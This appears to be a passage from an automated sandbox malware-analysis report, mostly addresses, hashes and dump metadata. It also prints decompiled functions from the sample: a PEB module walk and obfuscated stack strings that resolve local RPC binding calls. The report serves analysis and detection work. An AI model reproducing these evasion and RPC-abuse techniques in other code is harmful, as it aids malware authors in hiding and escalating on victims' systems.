0x00407d71
0x00407d74
0x00407d77
0x00407d7a
0x00407d7f
0x00407d82
0x00407d8b
0x00407d8e
0x00407d97
0x00407d9a
0x00407da1
0x00407da4
0x00407da7
0x00407db0
0x00407db3
0x00407dbc
0x00407dbf
0x00407dc1
0x00407dc9
0x00407dcc
0x00407dd4
0x00407dd7
0x00407ddf
0x00407de2
0x00407de9
0x00407dec
0x00407df4
0x00407df7
0x00407dfe
0x00407e04
0x00407e07
0x00407e0d
0x00407e10
0x00407e12
0x00407e1b
0x00407e1e
0x00407e25
0x00407e28
0x00407e2b
0x00407e30
0x00407e33
0x00407e3b
0x00407e3e
0x00407e41
0x00407e44
0x00407e4a
0x00407e4d
0x00407e50
0x00407e53
0x00407e59
0x00407e5f
0x00407e66
0x00407e69
0x00407e6c
0x00407e72
0x00407e7a
0x00407e7d
0x00407e80
0x00407e83
0x00407e89
0x00407e8c
0x00407e8f
0x00407e95
0x00407e9c
0x00407e9f
0x00407ea2
0x00407ea5
0x00407ea8
0x00407ead
0x00407eb0
0x00407eb6
0x00407ebb
0x00407ebe
0x00407ec1
0x00407ec6
0x00407ec9
0x00407ed0
0x00407ed3
0x00407ed6
0x00407ed9
0x00407ede
0x00407ee1
0x00407ee3
0x00407ee5
0x00407eeb
0x00407ef1
0x00407ef4
0x00407efa
0x00407f00
0x00407f03
0x00407f05
0x00407f08
0x00407f0e
0x00407f11
0x00407f16
0x00407f19
0x00407f1e
0x00407f21
0x00407f23
0x00407f23
0x00407f27
0x00407f27
0x00407f30
0x00407f39
0x00407f3c
0x00407f3e
0x00407f41
0x00407f43
0x00407f46
0x00407f4d
0x00407f51
0x00407f52
0x00407f5f
0x00407f68

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453533f2b0edcba408012853b8fbcf52b5e680b597a307acfa68e0d41b2ce6ab
Instruction ID: db68d2dbb4632e4a7e10d0ca1a43b0cdd230d6e67cdf9e74a64b081b93d9af86
Opcode Fuzzy Hash: 453533f2b0edcba408012853b8fbcf52b5e680b597a307acfa68e0d41b2ce6ab
Instruction Fuzzy Hash: 6EA17CB5D002199FCF80CFA9D985ADEFBF5FF88214F24816AE414F7210E274AA558B54

Uniqueness

Uniqueness Score: 0.00%

Function 0040E130, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95320e65bbc51851686c7fb269e71e4a49bf3e6c12efcb3c43732c8e4c959ea4
Instruction ID: 3a637746ab141f5cf09ed4f51c45bb881eae7df7fcf265745804621d79df00f1
Opcode Fuzzy Hash: 95320e65bbc51851686c7fb269e71e4a49bf3e6c12efcb3c43732c8e4c959ea4
Instruction Fuzzy Hash: CC418E726083168BC718CE6DC89442BB7A6ABC4340F494B3EF551EB3C4C774E915CB95

Uniqueness

Uniqueness Score: 0.00%

Function 00434448, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bfc4ef94dec58cc0bda972c04df9cdf9391d98e554f94c9ea746a40f4b2c3e
Instruction ID: 907468139e1a86a3f99867eba731a1c0110c14d5606a25d6e1a42aca4e774067
Opcode Fuzzy Hash: a9bfc4ef94dec58cc0bda972c04df9cdf9391d98e554f94c9ea746a40f4b2c3e
Instruction Fuzzy Hash: D821A473F2043847770CC47E8C522BDB6E1C68C601745427AE8A6DA2C1D968D917E2E4

Uniqueness

Uniqueness Score: 0.00%

Function 00434448, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bfc4ef94dec58cc0bda972c04df9cdf9391d98e554f94c9ea746a40f4b2c3e
Instruction ID: 907468139e1a86a3f99867eba731a1c0110c14d5606a25d6e1a42aca4e774067
Opcode Fuzzy Hash: a9bfc4ef94dec58cc0bda972c04df9cdf9391d98e554f94c9ea746a40f4b2c3e
Instruction Fuzzy Hash: D821A473F2043847770CC47E8C522BDB6E1C68C601745427AE8A6DA2C1D968D917E2E4

Uniqueness

Uniqueness Score: 0.00%

Function 00434324, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de019fa10c2404c7e1600dc144bed599afe4df287d32fd99dc291c7fd2e434a
Instruction ID: 40ecf0551b2755dde0719d7a1e22a3317dcfe419ca5bd43a4154428569c68b1f
Opcode Fuzzy Hash: 1de019fa10c2404c7e1600dc144bed599afe4df287d32fd99dc291c7fd2e434a
Instruction Fuzzy Hash: EB11AB23F30C2957275C816D8C132BAA1D6DBDC15070F533BDC26E7284E954DE13D290

Uniqueness

Uniqueness Score: 0.00%

Function 004057C0, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0849fafeba86cd4dfcacbd1a46c8baebb62f73c9984c97f7aef69e1eb0e62f0f
Instruction ID: 1cb5992e356d7c5ec97b5e4b14ba5f0c9e997c34d3f52cf42ec563df0b1e1a47
Opcode Fuzzy Hash: 0849fafeba86cd4dfcacbd1a46c8baebb62f73c9984c97f7aef69e1eb0e62f0f
Instruction Fuzzy Hash: 7F219D36304A098FD758EA2EC88491BF3D2EB98340B54853AE159D7680DB78EC159B98

Uniqueness

Uniqueness Score: 0.00%

Function 00434324, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de019fa10c2404c7e1600dc144bed599afe4df287d32fd99dc291c7fd2e434a
Instruction ID: 40ecf0551b2755dde0719d7a1e22a3317dcfe419ca5bd43a4154428569c68b1f
Opcode Fuzzy Hash: 1de019fa10c2404c7e1600dc144bed599afe4df287d32fd99dc291c7fd2e434a
Instruction Fuzzy Hash: EB11AB23F30C2957275C816D8C132BAA1D6DBDC15070F533BDC26E7284E954DE13D290

Uniqueness

Uniqueness Score: 0.00%

Function 0040BB10, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 409413388ad28ce1769224a3ffd309b144c2fb18c7e3f53abe2d426cc1ac6634
Instruction ID: 9897499bd176612c1f8ace3acedd4d4f31e9a383f3e3c7e66c98d5cfb3cd5c20
Opcode Fuzzy Hash: 409413388ad28ce1769224a3ffd309b144c2fb18c7e3f53abe2d426cc1ac6634
Instruction Fuzzy Hash: A111D63272151187E714CF39C9916A2B7E1FB98314B444B79E83ACF2C6C734B515CB98

Uniqueness

Uniqueness Score: 0.00%

Function 0042C592, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2172b7caf7206e6883b6d40ceaffd83cb401ddca2be6d16db2fa53c0e3e1ecf6
Instruction ID: 25e24a65074061e19c5d5451db3d723f6db387a2ac3f33a6dd8cb1f31e6d115c
Opcode Fuzzy Hash: 2172b7caf7206e6883b6d40ceaffd83cb401ddca2be6d16db2fa53c0e3e1ecf6
Instruction Fuzzy Hash: 9AE08C32A21238EBC725DBCDE944A9AF7ECEB49B10B95019BF904D3200C2B4EE40C7D4

Uniqueness

Uniqueness Score: 0.00%

Function 0042C592, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2172b7caf7206e6883b6d40ceaffd83cb401ddca2be6d16db2fa53c0e3e1ecf6
Instruction ID: 25e24a65074061e19c5d5451db3d723f6db387a2ac3f33a6dd8cb1f31e6d115c
Opcode Fuzzy Hash: 2172b7caf7206e6883b6d40ceaffd83cb401ddca2be6d16db2fa53c0e3e1ecf6
Instruction Fuzzy Hash: 9AE08C32A21238EBC725DBCDE944A9AF7ECEB49B10B95019BF904D3200C2B4EE40C7D4

Uniqueness

Uniqueness Score: 0.00%

Function 0040108B, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040108B(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr* _t17;

				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
				do {
					_t10 =  *((intOrPtr*)(_t17 + 8));
					_t12 =  *((intOrPtr*)(_t17 + 0x20));
					_t17 =  *_t17;
				} while ( *((intOrPtr*)(_t12 + 0xc)) != 0x320033);
				_v8 = _t10;
				return _v8;
			}

0x0040109b
0x0040109e
0x0040109e
0x004010a1
0x004010a4
0x004010a6
0x004010af
0x004010ba

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 860690b05a3794a16794302d7bcde30959448bb896e8411f951700468429c87e
Instruction ID: 07498e9c140ca45034804e633eb433dc19f08a2facaa7eab347a3bd266fa16ca
Opcode Fuzzy Hash: 860690b05a3794a16794302d7bcde30959448bb896e8411f951700468429c87e
Instruction Fuzzy Hash: DEE01A3A901A18DBCB20CF46D400856F3F8FB88270B15859ADC8963B009370BD00CAD0

Uniqueness

Uniqueness Score: 0.00%

Function 001E1530, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1853866261.001E0000.00000040.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.00%

Function 001E3104, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.00%

Function 0040E6B9, Relevance: 72.1, APIs: 6, Strings: 35, Instructions: 357
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 41%

			E0040E6B9(intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				short _v19;
				char _v20;
				short _v22;
				char _v23;
				char _v24;
				char _v28;
				short _v31;
				char _v32;
				char _v33;
				char _v34;
				intOrPtr _v38;
				char _v39;
				char _v40;
				char _v44;
				short _v49;
				char _v50;
				short _v52;
				char _v53;
				intOrPtr _v57;
				char _v58;
				short _v60;
				char _v61;
				char _v62;
				short _v64;
				char _v65;
				char _v66;
				intOrPtr _v70;
				char _v71;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v81;
				char _v82;
				short _v84;
				intOrPtr _v88;
				char _v89;
				short _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				short _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v104;
				short _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				short _v113;
				char _v114;
				char _v115;
				char _v116;
				intOrPtr _v120;
				char _v121;
				short _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				short _v129;
				char _v130;
				char _v131;
				char _v132;
				intOrPtr _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				char _v152;
				intOrPtr _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				short _v172;
				short _v174;
				short _v176;
				intOrPtr _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				short _v196;
				short _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				short _v216;
				short _v218;
				short _v220;
				short _v222;
				short _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				short _v234;
				short _v236;
				short _v238;
				short _v240;
				short _v242;
				short _v244;
				short _v246;
				short _v248;
				short _v250;
				char _v252;
				_Unknown_base(*)()* _v256;
				_Unknown_base(*)()* _v260;
				_Unknown_base(*)()* _v264;
				intOrPtr _v268;
				char _v272;
				char _v276;
				char _v280;
				short _t162;
				short _t163;
				short _t164;
				short _t165;
				short _t166;
				short _t167;
				char _t171;
				char _t172;
				_Unknown_base(*)()* _t174;
				char _t175;
				_Unknown_base(*)()* _t177;
				char _t179;
				char _t180;
				_Unknown_base(*)()* _t182;
				short _t183;
				short _t184;
				short _t185;
				short _t186;
				short _t187;
				short _t188;
				short _t189;
				short _t190;
				short _t191;
				short _t192;
				short _t193;
				short _t194;
				short _t195;
				short _t196;
				short _t197;
				short _t199;
				short _t200;
				short _t201;
				short _t202;
				char _t211;
				char _t212;
				char _t213;
				_Unknown_base(*)()* _t215;
				char _t217;
				char _t218;
				char _t219;
				char _t220;
				_Unknown_base(*)()* _t222;
				void* _t227;
				char _t228;
				short _t229;
				short _t230;
				char _t231;
				char _t232;
				short _t233;
				short _t234;
				short _t235;
				char _t236;
				char _t238;
				char _t239;
				short _t242;
				short _t243;
				char _t244;
				short _t247;
				short _t248;
				short _t249;
				short _t250;
				void* _t251;
				struct HINSTANCE__* _t252;

				asm("stosd");
				_t228 = 0;
				_v12 = 0;
				_v8 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t162 = 0x72;
				_t229 = 0x70;
				_v176 = _t162;
				_v170 = _t162;
				_v174 = _t229;
				_t230 = 0x63;
				_t163 = 0x74;
				_v168 = _t163;
				_t164 = 0x34;
				_v166 = _t164;
				_t165 = 0x2e;
				_v164 = _t165;
				_t166 = 0x64;
				_v162 = _t166;
				_t167 = 0x6c;
				_v160 = _t167;
				_v158 = _t167;
				_v156 = 0;
				_v172 = _t230;
				_t252 = LoadLibraryW( &_v176);
				if(_t252 != 0) {
					_t171 = 0x6e;
					_v23 = _t171;
					_v20 = _t171;
					_t172 = 0x65;
					_v16 = _t172;
					_v15 = _t172;
					_v28 = 0x42637052;
					_v24 = 0x69;
					_v22 = 0x6964;
					_v19 = 0x4667;
					_v17 = 0x72;
					_v14 = 0;
					_t174 = GetProcAddress(_t252,  &_v28);
					_v264 = _t174;
					if(_t174 != 0) {
						_t231 = 0x70;
						_t175 = 0x6e;
						_v71 = _t231;
						_v65 = _t175;
						_v61 = _t175;
						_v58 = _t175;
						_v53 = _t231;
						_t232 = 0x65;
						_v72 = 0x52;
						_v70 = 0x72745363;
						_v66 = 0x69;
						_v64 = 0x4267;
						_v62 = 0x69;
						_v60 = 0x6964;
						_v57 = 0x6d6f4367;
						_v52 = 0x736f;
						_v50 = _t232;
						_v49 = 0x57;
						_t177 = GetProcAddress(_t252,  &_v72);
						_v256 = _t177;
						if(_t177 == 0) {
							goto L3;
						}
						_t179 = 0x72;
						_v39 = _t179;
						_v34 = _t179;
						_t180 = 0x65;
						_v33 = _t180;
						_v32 = _t180;
						_v44 = 0x53637052;
						_v40 = 0x74;
						_v38 = 0x46676e69;
						_v31 = 0x57;
						_t182 = GetProcAddress(_t252,  &_v44);
						_v260 = _t182;
						if(_t182 == 0) {
							goto L3;
						}
						_t183 = 0x63;
						_t247 = 0x38;
						_v252 = _t183;
						_t184 = 0x62;
						_v248 = _t184;
						_t185 = 0x61;
						_v246 = _t185;
						_t186 = 0x37;
						_v244 = _t186;
						_t187 = 0x33;
						_t233 = 0x64;
						_v242 = _t187;
						_v240 = _t233;
						_t234 = 0x32;
						_t242 = 0x2d;
						_v234 = _t187;
						_t188 = 0x64;
						_v232 = _t188;
						_t189 = 0x35;
						_v230 = _t189;
						_v228 = _t189;
						_t190 = 0x34;
						_v224 = _t190;
						_v238 = _t234;
						_v222 = _t234;
						_t235 = 0x39;
						_t191 = 0x63;
						_v218 = _t191;
						_t192 = 0x65;
						_v250 = _t247;
						_v214 = _t247;
						_t248 = 0x61;
						_v236 = _t242;
						_v226 = _t242;
						_v216 = _t242;
						_v212 = _t192;
						_v206 = _t242;
						_t243 = 0x63;
						_t193 = 0x34;
						_v202 = _t193;
						_v200 = _t193;
						_t194 = 0x66;
						_v198 = _t194;
						_t195 = 0x30;
						_v196 = _t195;
						_v194 = _t195;
						_t196 = 0x36;
						_v208 = _t248;
						_t249 = 0x66;
						_v192 = _t196;
						_v188 = _t196;
						_t197 = _t249;
						_v220 = _t235;
						_v210 = _t235;
						_v204 = _t243;
						_v190 = _t249;
						_v186 = _t235;
						_v184 = _t197;
						_v182 = _t243;
						_v180 = 0;
						_t199 = 0x6e;
						_t250 = 0x61;
						_v152 = _t199;
						_t200 = 0x6c;
						_v146 = _t200;
						_t201 = 0x72;
						_v144 = _t201;
						_t202 = 0x70;
						_v142 = _t202;
						_v138 = 0;
						_v150 = _t243;
						_v148 = _t250;
						_v140 = _t243;
						_t251 = _v256( &_v252,  &_v152, 0, 0, 0,  &_v12);
						if(_t251 != 0) {
							L14:
							_t228 = _v8;
							L15:
							if(_t228 != 0) {
								_v264( &_v8);
							}
							return _t251;
						}
						_t211 = 0x70;
						_v131 = _t211;
						_t212 = 0x63;
						_v130 = _t212;
						_t213 = 0x6e;
						_t244 = 0x64;
						_t236 = 0x72;
						_v127 = _t213;
						_v124 = _t213;
						_v114 = _t213;
						_v110 = _t213;
						_v107 = _t213;
						_v132 = 0x52;
						_v129 = 0x6942;
						_v126 = _t244;
						_v125 = 0x69;
						_v123 = 0x4667;
						_v121 = _t236;
						_v120 = 0x74536d6f;
						_v116 = _t236;
						_v115 = 0x69;
						_v113 = 0x4267;
						_v111 = 0x69;
						_v109 = _t244;
						_v108 = 0x69;
						_v106 = 0x5767;
						_v104 = 0;
						_t215 = GetProcAddress(_t252,  &_v132);
						if(_t215 == 0) {
							goto L3;
						}
						_t251 =  *_t215(_v12,  &_v8);
						if(_v12 != 0) {
							_v260( &_v12);
						}
						if(_t251 != 0) {
							goto L14;
						} else {
							_t217 = 0x70;
							_v99 = _t217;
							_t218 = 0x63;
							_v98 = _t218;
							_t219 = 0x6e;
							_t238 = 0x64;
							_v94 = _t238;
							_t239 = 0x65;
							_v95 = _t219;
							_v92 = _t219;
							_v82 = _t219;
							_t220 = 0x66;
							_v81 = _t220;
							_v280 = 1;
							_v268 = 3;
							_v276 = _t228;
							_v272 = _t228;
							_v100 = 0x52;
							_v97 = 0x6942;
							_v93 = 0x69;
							_v91 = 0x5367;
							_v89 = _t239;
							_v88 = 0x74754174;
							_v84 = 0x4968;
							_v80 = 0x5778456f;
							_v76 = _t228;
							_t222 = GetProcAddress(_t252,  &_v100);
							if(_t222 == 0) {
								goto L3;
							}
							_t251 =  *_t222(_v8, _t228, 6, 0xa, _t228, _t228,  &_v280);
							if(_t251 != 0) {
								goto L14;
							}
							_v8 = _t228;
							 *_a4 = _v8;
							goto L15;
						}
					}
					L3:
					return 0x6e8;
				}
				_t227 = 5;
				return _t227;
			}

0x0040e6cd
0x0040e6ce
0x0040e6d2
0x0040e6d5
0x0040e6d8
0x0040e6d9
0x0040e6da
0x0040e6db
0x0040e6de
0x0040e6e1
0x0040e6e8
0x0040e6ef
0x0040e6f6
0x0040e6f9
0x0040e6fc
0x0040e703
0x0040e706
0x0040e70d
0x0040e710
0x0040e717
0x0040e718
0x0040e721
0x0040e722
0x0040e729
0x0040e732
0x0040e73f
0x0040e74c
0x0040e750
0x0040e762
0x0040e765
0x0040e768
0x0040e76b
0x0040e76c
0x0040e76f
0x0040e777
0x0040e77e
0x0040e782
0x0040e788
0x0040e78e
0x0040e792
0x0040e795
0x0040e797
0x0040e79f
0x0040e7ad
0x0040e7b0
0x0040e7b3
0x0040e7b6
0x0040e7b9
0x0040e7bc
0x0040e7c2
0x0040e7c5
0x0040e7c8
0x0040e7cc
0x0040e7d3
0x0040e7d7
0x0040e7dd
0x0040e7e1
0x0040e7e7
0x0040e7ee
0x0040e7f4
0x0040e7f7
0x0040e7fd
0x0040e7ff
0x0040e807
0x00000000
0x00000000
0x0040e80b
0x0040e80e
0x0040e811
0x0040e814
0x0040e815
0x0040e818
0x0040e820
0x0040e827
0x0040e82b
0x0040e832
0x0040e838
0x0040e83a
0x0040e842
0x00000000
0x00000000
0x0040e84a
0x0040e84d
0x0040e850
0x0040e857
0x0040e85a
0x0040e861
0x0040e864
0x0040e86b
0x0040e86e
0x0040e875
0x0040e878
0x0040e87b
0x0040e882
0x0040e889
0x0040e88c
0x0040e88f
0x0040e896
0x0040e899
0x0040e8a0
0x0040e8a3
0x0040e8aa
0x0040e8b1
0x0040e8b4
0x0040e8bb
0x0040e8c2
0x0040e8c9
0x0040e8cc
0x0040e8cf
0x0040e8d6
0x0040e8d9
0x0040e8e0
0x0040e8e7
0x0040e8ea
0x0040e8f1
0x0040e8f8
0x0040e8ff
0x0040e906
0x0040e90d
0x0040e910
0x0040e913
0x0040e91a
0x0040e921
0x0040e924
0x0040e92b
0x0040e92e
0x0040e935
0x0040e93c
0x0040e93f
0x0040e946
0x0040e948
0x0040e94f
0x0040e956
0x0040e957
0x0040e95e
0x0040e965
0x0040e96c
0x0040e973
0x0040e97a
0x0040e985
0x0040e98c
0x0040e992
0x0040e995
0x0040e998
0x0040e99f
0x0040e9a2
0x0040e9a9
0x0040e9ac
0x0040e9b3
0x0040e9b4
0x0040e9bd
0x0040e9d0
0x0040e9de
0x0040e9e6
0x0040e9f3
0x0040e9f7
0x0040eb46
0x0040eb46
0x0040eb49
0x0040eb4b
0x0040eb51
0x0040eb51
0x00000000
0x0040eb57
0x0040e9ff
0x0040ea02
0x0040ea05
0x0040ea08
0x0040ea0b
0x0040ea0e
0x0040ea11
0x0040ea12
0x0040ea15
0x0040ea18
0x0040ea1b
0x0040ea1e
0x0040ea26
0x0040ea2a
0x0040ea30
0x0040ea33
0x0040ea37
0x0040ea3d
0x0040ea40
0x0040ea47
0x0040ea4a
0x0040ea4e
0x0040ea54
0x0040ea58
0x0040ea5b
0x0040ea5f
0x0040ea65
0x0040ea68
0x0040ea70
0x00000000
0x00000000
0x0040ea7f
0x0040ea84
0x0040ea8a
0x0040ea8a
0x0040ea92
0x00000000
0x0040ea98
0x0040ea9a
0x0040ea9d
0x0040eaa0
0x0040eaa3
0x0040eaa6
0x0040eaa9
0x0040eaac
0x0040eaaf
0x0040eab2
0x0040eab5
0x0040eab8
0x0040eabb
0x0040eabc
0x0040eac4
0x0040eace
0x0040ead8
0x0040eade
0x0040eae4
0x0040eae8
0x0040eaee
0x0040eaf2
0x0040eaf8
0x0040eafb
0x0040eb02
0x0040eb08
0x0040eb0f
0x0040eb12
0x0040eb1a
0x00000000
0x00000000
0x0040eb33
0x0040eb37
0x00000000
0x00000000
0x0040eb3f
0x0040eb42
0x00000000
0x0040eb42
0x0040ea92
0x0040e7a1
0x00000000
0x0040e7a1
0x0040e754
0x00000000

APIs

LoadLibraryW.KERNEL32(?), ref: 0040E746
GetProcAddress.KERNEL32(00000000,?), ref: 0040E795
GetProcAddress.KERNEL32(00000000,?), ref: 0040E7FD
GetProcAddress.KERNEL32(00000000,?), ref: 0040E838
GetProcAddress.KERNEL32(00000000,?), ref: 0040EA68
GetProcAddress.KERNEL32(00000000,?), ref: 0040EB12

Strings

gB, xrefs: 0040E7D7
cStr, xrefs: 0040E7CC
RpcS, xrefs: 0040E820
i, xrefs: 0040EA5B
i, xrefs: 0040E7D3
di, xrefs: 0040E7E1
i, xrefs: 0040EA54
omSt, xrefs: 0040EA40
t, xrefs: 0040E827
os, xrefs: 0040E7EE
gF, xrefs: 0040EA37
W, xrefs: 0040E7F7
R, xrefs: 0040EA26
gS, xrefs: 0040EAF2
Bi, xrefs: 0040EAE8
tAut, xrefs: 0040EAFB
di, xrefs: 0040E782
gB, xrefs: 0040EA4E
i, xrefs: 0040EA4A
R, xrefs: 0040EAE4
R, xrefs: 0040E7C8
gCom, xrefs: 0040E7E7
i, xrefs: 0040E7DD
i, xrefs: 0040EA33
W, xrefs: 0040E832
r, xrefs: 0040E78E
Bi, xrefs: 0040EA2A
gW, xrefs: 0040EA5F
oExW, xrefs: 0040EB08
hI, xrefs: 0040EB02
RpcB, xrefs: 0040E777
ingF, xrefs: 0040E82B
i, xrefs: 0040E77E
i, xrefs: 0040EAEE
gF, xrefs: 0040E788

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: Bi$Bi$R$R$R$RpcB$RpcS$W$W$cStr$di$di$gB$gB$gCom$gF$gF$gS$gW$hI$i$i$i$i$i$i$i$i$ingF$oExW$omSt$os$r$t$tAut
API String ID: 2238633743-3826838333
Opcode ID: 0ab0a9e13a9e389742d26392c8bc21c82e2a2c59c93525810245c9f80f8bb38f
Instruction ID: b374c70295458459cc07976a0d06d90be8fdb7e1daffe80b828f5eba164e4182
Opcode Fuzzy Hash: 0ab0a9e13a9e389742d26392c8bc21c82e2a2c59c93525810245c9f80f8bb38f
Instruction Fuzzy Hash: 18E18F21E55398EDEB21CBE4DC41BEEBB74AF15710F1444DBD548FB291E2B10A84CB26

Uniqueness

